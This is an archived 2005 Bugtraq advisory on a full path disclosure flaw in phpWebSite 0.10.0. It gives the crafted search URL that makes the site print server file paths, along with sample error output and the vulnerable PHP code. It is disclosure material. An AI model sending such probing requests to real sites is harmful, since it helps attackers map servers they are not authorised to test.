lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050225042051.2725.qmail@www.securityfocus.com>
Date: 25 Feb 2005 04:20:51 -0000
From: HaCkZaTaN. <hck_zatan@...mail.com>
To: bugtraq@...urityfocus.com
Subject: phpWebSite 0.10.0 Full Path disclosure




/*

--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST]® [ [ wWw.SoSvulnerable.NeT ] ]® 
--------------------------------------------------------
Program:  phpWebSite 0.10.0
Homepage:  http://phpwebsite.appstate.edu
Vulnerable Versions: All
Risk: High!!
Impact: Full Path disclosure
 
      -==phpWebSite 0.10.0 Full Path disclosure==-
---------------------------------------------------------

- Description
---------------------------------------------------------
phpWebSite provides a complete web site content management
system. Web-based administration allows for easy maintenance
of interactive, community-driven web sites.

A remote attacker may exploit this condition to view full path
This vulnerability is reported to affect phpWebSite versions
up to an including version 0.10.0. 

- Tested
---------------------------------------------------------
LocalHost!! and other phpWebSites

- Explotation
---------------------------------------------------------
index.php?module=search&SEA_search_op=search&SEA_search_module=[NST & SVL]

it'll come out something like:
Warning: search(/home/grgfidcd/public_html/ccToronto/mod/[NST /conf/search.php):
failed to open stream: No such file or directory in
/home/grgfidcd/public_html/ccToronto/mod/search/class/Search.php on line 51

Warning: search(/home/grgfidcd/public_html/ccToronto/mod/[NST /conf/search.php):
failed to open stream: No such file or directory in
/home/grgfidcd/public_html/ccToronto/mod/search/class/Search.php on line 51

Warning: search(): Failed opening '/home/grgfidcd/public_html/ccToronto/mod/[NST /conf/search.php' for inclusion
(include_path='.:/home/grgfidcd/public_html/ccToronto/lib/pear/') in
/home/grgfidcd/public_html/ccToronto/mod/search/class/Search.php on line 51

-----[ Start Vuln Code ] ------------------------------------

  function search() {
    if(!isset($_REQUEST['mod']) || !is_string($_REQUEST['mod'])) {
      $module = "all";
    } else {
      $module = $_REQUEST['mod'];
    }

    $this->lists = array();

    if(isset($_REQUEST['query'])) {
      $this->query = preg_replace("/[^\.A-Za-z0-9_-\s]/", "", $_REQUEST['query']);
    } else {
      return $this->results();
    }

-----[ Ends Vulns Code ] ------------------------------------

- Exploit
---------------------------------------------------------
Not Yet xD

- Solutions
--------------------------------------------------------
Not Yet

- References
--------------------------------------------------------
http://neossecurity.net/Advisories/Advisory-05.txt


- Credits
-------------------------------------------------
Discovered by HaCkZaTaN and LINUX <hck_zatan@...mail.com> - <svsecurity@...il.com>

[N]eo [S]ecurity [T]eam [NST]® - http://neossecurity.net/ 

[ [ wWw.SoSvulnerable.NeT ] ]® - http://sosvulnerable.net/ 

Got Questions? http://sosvulnerable.net  - http://neossecurity.net/ 

Irc.InfoGroup.cl #neosecurityteam
Irc.GigaChat.net #swc
- Greets
--------------------------------------------------------
           Paisterist             
           T0wn3r                
           LINUX                  
	   Heap
           Nitrous
           CrashCool
           eL_mEsIaS
           Makoki
           Infektion group
           And my Colombian people

	@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
	'@@@@@''@@'@@@''''''''@@''@@@''@@
	'@@'@@@@@@''@@@@@@@@@'''''@@@
	'@@'''@@@@'''''''''@@@''''@@@
	@@@@''''@@'@@@@@@@@@@''''@@@@@
*/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ